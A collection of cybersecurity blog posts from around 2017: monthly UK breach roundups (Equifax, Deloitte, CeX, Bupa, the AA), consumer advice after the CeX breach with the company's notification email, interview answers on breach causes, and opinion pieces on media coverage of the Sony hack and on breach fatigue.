Finally, the UK National Cyber Security Centre (NCSC) released its first annual report, as it seeks to improve cybersecurity across the UK. Among NCSC achievements cited in the report are:
  • The launch of Active Cyber Defence, credited with reducing average time a phishing site is online from 27 hours to 1 hour
  • Led UK response to WannaCry
  • Advice website with up to 100,000 visitors per month
  • Three-day Cyber UK Conference in Liverpool
  • 43% increase in visits to the Cyber Security Information Sharing Partnership (CiSP)
  • Produced 200,000 physical items for 190 customer departments via UK Key Production authority to secure and protect communications of Armed Forces and national security
  • 1,000 youngsters on CyberFirst courses and 8,000 young women on CyberFirst Girls competition.
  • Worked with 50 countries, including signing Nato's MoU
NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

Cyber Security Roundup for September 2017

A massive data breach at Equifax dominated the UK media finance headlines this month, after 143 million customer records were compromised by a cyber-attack, 400,000 of which were UK customer accounts. Hackers took advantage of Equifax’s negligence in not applying security updates to servers. The data breach has already cost the CEO, CIO and CISO their jobs. In the UK Equifax faces investigations and the prospect of significant fines by both the Financial Conduct Authority and the Information Commissioner's Office over the loss of UK customer financial and personal data respectively.

Hackers stole a quarter of a million Deloitte client emails, follow the breach Deloitte was criticised by security professional for not adopting two-factor authentication to protect the email data which they hosted in Microsoft’s Azure cloud service.

September was an extremely busy month for security updates, with major patches releases by Microsoft, Adobe, Apache, Cisco and Apple to fix an array of serious security vulnerabilities including BlueBorne, a Bluetooth bug which exposes billions of devices to man-in-the-middle attacks.

UK government suppliers using Kaspersky to secure their servers and endpoints may well be feeling a bit nervous about the security software after Kaspersky was banned by US Government agencies. The US Senate accused the 20-year-old Russian based security company as being a pawn of the Kremlin and posing a national risk to security. Given the US and UK intelligence agency close ties, there are real fears it could lead to a similar ban in the UK as well. A UK ban could, in theory, be quickly extended to UK government suppliers through the Cyber Essentials scheme, given the Cyber Essentials accreditation is required at all UK government suppliers.

While on the subject of the Russia, the English FA has increased its cybersecurity posture ahead of next year's World Cup, likely due to concerns about the Russian Bears hacking group. The hacking group has already targeted a number of sports agencies in recent months, including hacking and releasing football player's world cup doping reports last month. 

In the last couple of weeks, I was Interviewed for Science of Security, and I updated my IBM Developer Works article on Combating IoT Cyber Threats.

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

Science of CyberSecurity: Latest Cyber Security Threats

As part of a profile interview for Science of Cybersecurity I was asked five questions on cyber security last week, here's question 5 of 5.

Q. What keeps you up at night in the context of the cyber environment that the world finds itself in?
The growing dependence and integration of connected computers within our daily lives, means we are embarking on an era where cyber attacks will endanger our lives. Networked and complex IT systems are inherently insecure, meaning it is open season for nation-states, cyber terrorists and the curious to attack these life integrated emerging technologies, from driverless cars and countless new home IoT devices. I fear it will only be a matter time before a cyber attack causes human harm or even loss of life. The impact of the recent NHS ransomware attack serves as a warning, this cyber attack directly caused the closure of accidental and energy departments and the cancellation of operations. The future threats posed artificial intelligence and quantum computing are also growing concerns for cyber security, and well worth keeping an eye as these technologies continue to progress.

Science of CyberSecurity: Reasons Behind Most Security Breaches

As part of a profile interview for Science of Cybersecurity I was asked five questions on cyber security last week, here's question 2 of 5.

Q. What – in your estimation – are the reasons behind the many computer security breaches/failures that we see today?
Simply put insecure IT systems and people are behind every breach, insecure IT systems are arguably caused by people as well, whether it is poor system management, lack of security design, insecure coding techniques, and or inadequate support, it all boils down to someone not doing security right. For many years seasoned security experts have advocated that people are the weakest link in security, even hackers say ‘amateurs hack systems, professionals hack people’, yet many organisations still focus most of their resources and funds heavily on securing IT systems over providing staff with sustained security awareness. Maybe this is a result of an IT security sales industry over hyping the effectiveness of technical security solutions. I think most organisations can do more to address this balance, starting with better understanding the awareness level and risk posed by their employees. For instance, the security awareness of staff can be measured by using a fake phishing campaign to detect how many staff would click on a link within a suspicious email. While analysing the root causes of past cyber security incidents is a highly valuable barometer in understanding the risk posed by staff, all can be used as inputs into the cyber risk assessment process.

Cyber Security Roundup for August 2017

TalkTalk yet again made all the wrong cyber security headlines in the UK this month, after it was handed a £100,000 fine by the Information Commissioner's Office (ICO) for not adequately protecting customer records from misuse by its staff. The ICO investigated the Internet Service Provider after receiving complaints from customers, who said they received cold calls from scammers who knew their TalkTalk account information.

Second-hand goods firm CeX disclosed a compromise of up to 2 million online customer accounts due to a hack, however, CeX has yet to disclose any details about the cyber attack. My blog post and advice about this is here http://blog.itsecurityexpert.co.uk/2017/08/up-to-2-million-cex-customer-account.html

Hackers had a field day taking over social media accounts, from Real Madrid and FC Barcelona to Game of Thrones, much embarrassment could have been avoided if they had adopted multi-factor authentication on the accounts, aside from the spate of Instagram hacks which were caused by the exploitation of a software vulnerability, namely within Instagram's API.

In what looks like a follow on from the UK's Parliament's email brute force email account attack in June, the Scottish Parliament was hit by a very similar cyber attack, it was reported, as per the Westminister attack, many SMPs were found to be using weak passwords. Let's hope the Welsh Assembly have taken note and have learned the password security lessons.

A massive 'spambot' holding 711 million email addresses was found to be spreading malware by a security researcher. It was said to have been put together using stolen data from previous LinkedIn and Badoo data breaches. Using legitimate email addresses helps in the avoidance of anti-phishing and spam filters.

On the ransomware front, LG reported WannaCry caused a two-day shutdown of its business in South Korea. TNT customers were said to be furious after NotPeyta badly affected its ability to deliver hundreds of thousands of items, particularly within in the Ukraine. And Digital Shadows reported a trend in cyber criminals dropping Exploit kits for Ransomware, as there is simply a lot more money to be made out of ransomware attacks.

On the critical security patching, Microsoft released 25, Adobe released 43, and Drupal patched a critical bug. And there was an interesting article posted by Microsoft on Cyber Resilience worth reading.

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

Up to 2 Million CeX Customer Accounts Compromised by Security Breach

If you are a CeX online customer, change your account password now, as the second hand UK goods chain has been informing over two million of its customers their personal details have been hacked. In a customer email CeX discloses they have been the subject of a security breach by a third party, and that's about as much detail as CeX are presently admitting about the cyber attack at the moment.

Despite the CeX email referring to a "sophisticated breach of security" without any further detail about what happened, it is impossible to judge whether it was actually a sophisticated cyber attack or not. Rather oddly CeX have not forced a password change on their compromised customer accounts despite admitting account passwords were at risk.  

My CeX Customer Advice
  • Change your CeX password straight away. Ignoring the CeX website advice of using a 6 character password, which is too weak - see the Account Password section of this post below.  Alternatively you could also close your CeX account through the website
  • If you have used your old CeX password on any other websites, change those account passwords quickly. 
  • Be vigilant for personalised scam emails from CeX, given cyber criminals might have your email address and know you are a CeX customer.
  • Review your Credit Card statement and Bank Statements for suspicious activity. Note CeX might have put your bank account details and BitCoin address at risk/

Data Compromised
CeX have not been too clear on detailing the customer account data that is at risk, stating  "The data includes some personal information such as first name, surname, addresses, email address and phone number if this was supplied". And "In a small number of instances, it may include encrypted data from expired credit and debit cards up to 2009. No further financial information has been shared."   

Reviewing a CeX website account suggests the following customer account personal data is at risk:
Email Address
BitCoin Address
Full Address
Bank Details - Account Holder Name, Sort Code, Account Number, Roll Number
Phone Number

It is concerning CeX refer to storing debit/credit card details past their expiry dates - why? CeX also appear to be glossing over the significance of compromised customer debit/credit card details in stating " We would like to make it clear that any payment card information that may have been taken, has long since expired".  A rather misleading statement given some payment card issuers use the debit/credit card number when reissuing new cards, and the new expiry date is guessable. Given that statement, you  have to wonder whether the CeX operation was secure enough to handle debit/credit card data, are CeX PCI DSS compliant.? Payment Card Industry Data Security Standard compliance is required for all organisations which process, store and/or transmit debit/credit card details, no PCI DSS compliant organisation ever been successfully breached.

Account Password
CeX also states the account passwords were not been stored in plain text, but have not advised how the passwords were protected. For instance, whether passwords were stored using a unique value (salt) together with the password before being scrambled with an industry recognised one-way hashing algorithm (adequate security protection), or by just using the hashing algorithm on the password (inadequate security protection). 
Change your CeX password

CeX recommends a 6 character password or longer on their website's password change process which is too weak. CeX customers should avoid setting that minimum 6 character strength, go for an at least 8 character password consisting of at least one number, one upper case character, one lower case and one special character (i..e #!"£$%^&). I recommend using a password manager (see advice on https://www.itsecurityexpert.co.uk) to generate a unique and secure random password of at least 12 characters to really be on the safe side.

By the CeX requires you know your old password in order to change it, so you'll have to hope the hacker hasn't changed your password.

CeX also has a "Cancel Your Account Option" which I assume will remove all personal data from CeX, customer's could submit a Data Subject Access Request to CeX after account closure to be certain.

Breach Recovered and Fixed?
CeX say "Our cyber security specialists have already put in place additional advanced measures to fix the problem and prevent this from happening again.", however, without any detail about the hack and the new measures put in place, this statement provides little assurance to CeX customers. The following statement also skirts what customers want to know  "additional measures were required to prevent such a sophisticated breach occurring and we have therefore employed a cyber security specialist to review our processes. Together we have implemented additional advanced measures of security to prevent this from happening ". If this cyber attack turns out not to be sophisticated, CeX can expect heavy criticism by a more cyber entitled media, and interest from the Information Commissioner's Office for violating the Data Protection Act.

CeX Email
Dear Customer,
We are writing to inform you that unfortunately we have recently been subject to an online security breach. We are taking this extremely seriously and want to provide you with details of the situation and how it might affect you. We also want to reassure you that we are investigating this as a priority and are taking a number of measures to prevent this from happening again.
The situation
As a result of a breach of security in which an unauthorised third party accessed our computer systems, we believe that some customer data has been compromised. This includes personal information, and, for a small number of customers, it also includes encrypted data from expired credit or debit cards. As a customer of CeX, there is a possibility this might affect you.
Please note, we did not have any card data stored for your account. We ceased storing customer card details in 2009.
What we’ve done about it
This was a sophisticated breach of security and we are working closely with the relevant authorities to help establish who was responsible. Our cyber security specialists have already put in place additional advanced measures to fix the problem and prevent this from happening again.
What we suggest you do?
  • Although we have put in place additional security measures, we recommend that you change the password for your webuy online account.
  • If you used the same password elsewhere, we also suggest that you change your password for those accounts.
Further details on this issue are provided in a Q&A below. If you have additional questions, please email us at: guidance@webuy.com where we will be compiling the most frequently asked questions, which will then be updated via uk.webuy.com/guidance
We apologise for inconvenience this may cause.
Yours sincerely,
David Mullins
Managing Director


Questions & Answers
How much data has been compromised?
As a precautionary measure we are contacting up to two million of our registered website customers who could potentially be affected.
Does this affect in-store membership personal information?
We have no indication that in-store personal membership information has been compromised.
What does the data include?
The data includes some personal information such as first name, surname, addresses, email address and phone number if this was supplied. In a small number of instances, it may include encrypted data from expired credit and debit cards up to 2009. No further financial information has been shared.
What about financial data?
A small amount of encrypted data from expired credit and debit cards may have been compromised. We would like to make it clear that any payment card information that may have been taken, has long since expired as we stopped storing financial data in 2009.
What has happened to the data that has been compromised?
We are aware that an unauthorised third party has accessed this data. We are working closely with the relevant authorities, including the police, with their investigation.
What should I do?
We advise that you change your webuy.com password, as well as any other online accounts where you may share the same password, as a precautionary measure.
Why do I need to change my passwords?
Although your password has not been stored in plain text, if it is not particularly complex then it is possible that in time, a third party could still determine your original password and could attempt to use it across other, unrelated services. As such, as a precautionary measure, we advise customers to change their password across other services where they may have re-used their WeBuy website password.
Can customers find out exactly what data has been shared about them?
At this stage, it is not possible for us to share this information as we are still undergoing an investigation. At this stage, we are alerting all customers who might have been affected as a precaution.
What security do you have in place to protect this data?
We take the protection of customer data extremely seriously and have always had a robust security programme in place which we continually reviewed and updated to meet the latest online threats. Clearly however, additional measures were required to prevent such a sophisticated breach occurring and we have therefore employed a cyber security specialist to review our processes. Together we have implemented additional advanced measures of security to prevent this from happening again.

Cyber Security Roundup for July 2017

Apologises for the delay in this month's Cyber Security Roundup release, I been away on holiday and taking a breach for monitor screens and keyboards for a couple of weeks.

The insider threat danger manifested at Bupa where an employee stole and shared 108,000 customer health insurance records. Bupa dismissed the employee and is planning to take legal action. The Bupa data breach was reported both to the FCA and the ICO, it remains to be seen if the UK government bodies will apportion any blame onto Bupa for the data loss. 

The AA was heavily criticised after it attempted to downplay a data compromise of over 13 gigabytes of its data, which included 117,000 customer records. The AA’s huge data cache was incorrectly made available online after an AA online shop server was “misconfigured” to share confidential data backup files.

A customer databreach for the World Wrestling Entertainment (WWE) should serve as a stark warning for businesses to adequately assure third parties and to secure hosted cloud systems. Three million WWE fan records were compromised after a third party misconfigured a cloud hosted Amazon server used by the WWE online shop.

The aftershock of Peyta \ NotPeyta rumbles on with, with malware still reported as disrupting firms weeks after the attack. There there are claims the mass media coverage of the attack have improved overall staff cyber security awareness.

It was found that over 1.6 million NHS patient records were illegally provided to Google's artificial intelligence arm, DeepMind, without patient concern meant the NHS and Google have breached the Data Protection Act.

A 29 year old British hacker named as Daniel K, but better known by his hacker handle "BestBuy" or "Popopret" admitted to hijack of 900,000 Deutsche Telekom routers in Germany after he was arrested at Luton airport in February. He said he made "the worst mistake of my life" when he carried out a failed attack in November for a Liberian client who paid him 8,500 Euros to attack the Liberian's business competitors. BestBuy used a variant of the Mirai malware to take advantage of a security vulnerability in Zyxel and Speedport model routers which were used by Germany Internet Service provider, with his intention to increase his botnet, and so the scale of DDoS attacks he could perform on behalf of clients.

A document from the National Cyber Security Centre (NCSC) was obtained by Motherboard and was verified by the BBC with NCSC as being legitimate. The document states some industrial software companies in the UK are "likely to have been compromised" by hackers, which is reportedly produced by the British spy agency GCHQ. The NCSC report discusses the threat to the energy and manufacturing sectors. It also cites connections from multiple UK internet addresses to systems associated with "advanced state-sponsored hostile threat actors" as evidence of hackers targeting energy and manufacturing organisations.

UniCredit Bank had over 400,000 customer loan accounts accessed through a third party. This is the second security breach at the Italian bank in a year.

Finally this blog was awarded with the Best Technology Blogs of 2017 by Market Inspector and by Feedspot this month.

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

When the Press Aids the Enemy

Let's start with this- Freedom of the press is a critical part of any free society, and more importantly, a democratically governed society.

But that being said, I can't help but think there are times when the actions of the media aid the enemy. This is a touchy subject so I'll keep it concise and just make a few points that stick in my mind.

First, it's pretty hard to argue that the media looks for ever-more sensational headlines, truth be damned, to get clicks and drive traffic to their publication. Whether it's digital or actual ink-on-paper sensationalism sells, there's no arguing with that.

What troubles me is that like in the war on terrorism, the enemy succeeds in their mission when the media creates hysteria and fear. This much should be clear. The media tend to feed into this pretty regularly and we see this in some of the most sensational headlines from stories that should told in fact, not fantasy.


So when I came across this article on Buzzfeed called "The Messy Media Ethics Behind the Sony Hacks" it suddenly hit me - the media may very well be playing perfectly into the enemy's hands. The "Guardians of Peace" (GOP) in their quest to ruin Sony Pictures Entertainment have stolen an unfathomable amount of information. As Steve Ragan who has repeatedly written on about this and many other breaches tweeted that's 200Gb or 287,000 documents. That's mind-blowing.

This cache of data has proven to be yet-unreleased movies, marketing presentations, email exchanges between executives and attorneys, financial plans, employees' medical records and so much more. The GOP have made it clear their aim is to "punish" Sony Pictures Entertainment - and while we don't really have an insight as to the true motivations here, I think it's clear that releasing all this data is meant to severely negatively impact the business.

What has followed in the days since the announcement of the hack is a never-ending stream of "news" articles that I struggle to understand. There were articles like this one providing commentary and analysis on internal marketing department presentations. There were articles analyzing the internal and privileged (as far as I know, but I'm not a lawyer) communications between corporate legal counsel and Sony Pictures executives. There were articles talking about the release of SPE employee medical records. The hit-parade goes on and on... and I'm not linking over to any more of the trash because it embarrasses me.

Clearly, clearly, the mainstream media (and hell even the not-so-mainstream) have long lost their ethics. Some would claim that it's the "freedom of the press" that allows them to re-publish and discuss sensitive, internal documents. Others argue that since it's already in the public domain (available on BitTorrent) then it's fair game. Note: This was discussed during the Snowden release - and it was clear that classified information released to the public domain does not suddenly lose its classified status. I'm fairly certain this easily applies to the not-national-security type of assets as well. To be honest, this argument makes me question the intellectual integrity of some of the people who make it.

Anyway, back to my point. If the GOP wanted to destroy Sony Pictures Entertainment then hacking in and releasing secret information and intellectual property was only half the battle. The second half, unfortunately, is being picked up and executed by the media, bloggers, and talking heads putting out "analysis" on all this data. Publishing links to the hacked data, analyzing its contents, and looking for further embarrassing and ugly things to publish- the media should be ashamed of itself.

The hack alone wasn't going to damage SPEs image to where it has fallen now - the media is clearly complicity in this and it's a shame. I'm not an attorney so I question whether publishing and discussing confidential communications between an attorney and executive is ethical. Forget that, is it even legal? Journalists and bloggers continue to hide behind the "freedom of the press", and some folks even to blasting me for daring to question the absolute rights of the press. Except - the freedom of the press isn't absolute, as far as I know.

But whether it's legal, clearly there are ethical problems here. If you're in the media and you're poring over the confidential email communications stolen from Sony Pictures Entertainment systems, I emphasize stolen, and you're commenting on this - to what end? Arguing that the media is releasing this information because (a) it's already in the public domain and (b) it's "for the public good" is ludicrous.

Remember - while you're reveling in someone else's misery that you too may be a coincidental victim one day. Then it'll be your turn to have your private information released and analyzed and attacked as part of the next breach. Your recourse? None... Glass houses, journalists. Glass houses.

The Other Side of Breach Hysteria

In a world where everyone is trying to sell you something, security is certainly no exception. But separating the hype from the truth can easily turn into a full time job if you're not careful.

With all the recent retail data breaches, it would appear as though the sky is falling in large chunks right on top of us. Every big-name retailer, and even some of the smaller ones, are being hacked and their precious card data is bring whisked away to be sold to miscreants and criminals.

Now enter the sales and marketing pitches. After every breach it would seem our mailboxes fill up with subject lines such as-
"Learn how not to be the next , read how our latest gizmo will keep you secure!"
I don't know about you, but the snake-oil pitch is starting to get old. While it's clear that the average buyer is getting the message about data breaches and hackers - I believe there are two other aspects of this which aren't talked about enough.

First there is the notion of "breach fatigue". If you read the news headlines you would have thought that everyone's bank accounts would be empty by now, and everyone in the United States would have been the victim of identity theft by now. But they haven't. Or they haven't been impacted directly. This leads to the Chicken Little problem.

You see, many security professionals cried that security incidents did not receive enough attention. Then the media took notice, and sensationalized the heck out of incidents to an almost rock-star fervor. The issue here is that I believe people are starting to grow weary of the "Oh no! Hackers are going to steal everything I have!" talk. Every incident is the biggest there has ever been. Every incident is hackers pillaging and stealing countless credit card records and identities. The average person doesn't quite know what to make of this, so they have no choice but to mentally assume the worst. Then - over time - the worst never comes. Sure, some get impacted directly but there is this thing called zero fraud liability (in the case of card fraud) that means they are impacted - but barely enough to notice because their banks make it alright. More on this in a minute.

We as humans have a shocking ability to develop a tolerance to almost anything. Data breach hysteria is no exception. I've now seen and heard people around televisions (at airports, for example, where I happen to be rather frequently) say things like "Oh well, more hackers, I keep hearing about these hackers and it never seems to make a difference." Make no mistake, this is bad.

You see, the other side of the awareness hill, which we are rapidly approaching, is apathy. This is the kind of apathy that is difficult to recover from because we push through the first wave of apathy into awareness, and then hysteria, which leads to a much stronger version of apathy where we will be stuck - I believe. So there we are, stuck.

If I'm honest, I'm sick and tired of all the hype surrounding data breaches. They happen every day of every week, and yet we keep acting like we're shocked that Retailer X, or Company Y was breached. Why are we still even shocked? Many are starting to lose the ability to become shocked - even though the numbers of records breached and scale of the intrusions is reaching absurd proportions.

Second point I'd like to make is around the notion of individual impact. Many people simply say that "this still doesn't impact me" because of a wonderful thing like zero fraud liability. Those 3 words have single-handedly destroyed the common person's ability to care about their credit card being stolen. After you've had your card cloned, or stolen online and had charges show up - you panic. Once you realize your bank has been kind enough to put the funds back, or roll-back the fraudulent charges you realize you have a safety net. Now these horrible, terrible, catastrophic breaches aren't so horrible, terrible and catastrophic. Now they're the bank's problem.

Every time someone has a case of credit card fraud the bank covers under zero fraud liability (and let's face it, most cards and banks have this today) - their level of apathy for these mega-breaches grows. I believe this is true. I also believe there is little we can do about it. Actually, I'm not sure if there is anything that needs to be done about it. Maybe things are just the way they're going to be.

There is a great phrase someone once used that I'm going to paraphrase and borrow here - things are as bad as the free market will support. If I may adapt this to security - the security of your organization is as good (or bad) as your business and your customers will support.

Think about that.